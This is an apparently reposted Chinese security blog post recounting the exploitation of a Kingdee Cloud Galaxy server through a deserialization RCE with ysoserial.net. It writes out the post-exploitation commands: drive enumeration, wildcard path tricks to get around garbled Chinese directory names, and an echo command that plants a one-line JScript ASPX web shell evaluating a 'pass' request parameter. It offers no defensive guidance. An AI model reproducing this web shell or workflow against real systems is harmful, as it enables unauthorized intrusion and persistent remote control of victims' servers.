重生第二篇之金蝶rce上传绕过

admin 2024年1月9日11:09:23评论18 views字数 760阅读2分32秒阅读模式

风和日丽的一天,正沉浸在宁静的午后,手机突然传来一阵滴滴声,感觉大事不妙,取出手机一看,是一位老大哥发来消息,内容令人好奇:“兄弟,我们公司有个应用系统可能有点问题,帮忙测试一波看看?”面对老哥这么BT的请求,觉得是一个有意思的挑战,欣然答应,冲TYD。

打开网站是一个金碟云星空站点,想起前不久爆出来的反序列化rce漏洞

重生第二篇之金蝶rce上传绕过
在进行测试时,发现这个系统存在金碟RCE漏洞。最初计划通过嘎嘎一顿输出直接命令上线C2服务器,但遇到了杀软的限制,且系统不允许使用远程下载命令。
使用ysoserial.net工具构造序列化数据实现RCE工具地址:https://github.com/pwntester/ysoserial.net使用工具生成payload
为了进一步渗透,我们考虑上传一个Shell文件。首先,我们需要查看文件结构,找到一个JS文件,进行文件名搜索,以确定目录位置。

重生第二篇之金蝶rce上传绕过
**第一步:查看存在哪些盘**```cmdfsutil fsinfo drives
重生第二篇之金蝶rce上传绕过
f: & cd & dir /S topca.js在F盘找到两个目录存在目标文件F:星空7.7ManageSitejscaF:星空7.7Websitejsca
重生第二篇之金蝶rce上传绕过
发现进入目录的时候存在问题,无法使用中文,使用中文会直接乱码
重生第二篇之金蝶rce上传绕过
使用通配符的方式进行中文绕过,例如:cd *7.7*
重生第二篇之金蝶rce上传绕过
确定目录为F:星空7.7Websitejsca进行文件写入,注意尖括号需要进行转义cd F:*7.7*Websitejs & echo ^<%@ Page Language="Jscript"%^> ^<%eval(Request.Item["pass"],"unsafe");%^> > shell.aspx

重生第二篇之金蝶rce上传绕过

连接shell
重生第二篇之金蝶rce上传绕过
梳理过程写个报告给大哥交差,结束。

原文始发于微信公众号(Seraph安全实验室):重生第二篇之金蝶rce上传绕过

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月9日11:09:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   重生第二篇之金蝶rce上传绕过http://cn-sec.com/archives/2378183.html

发表评论

匿名网友 填写信息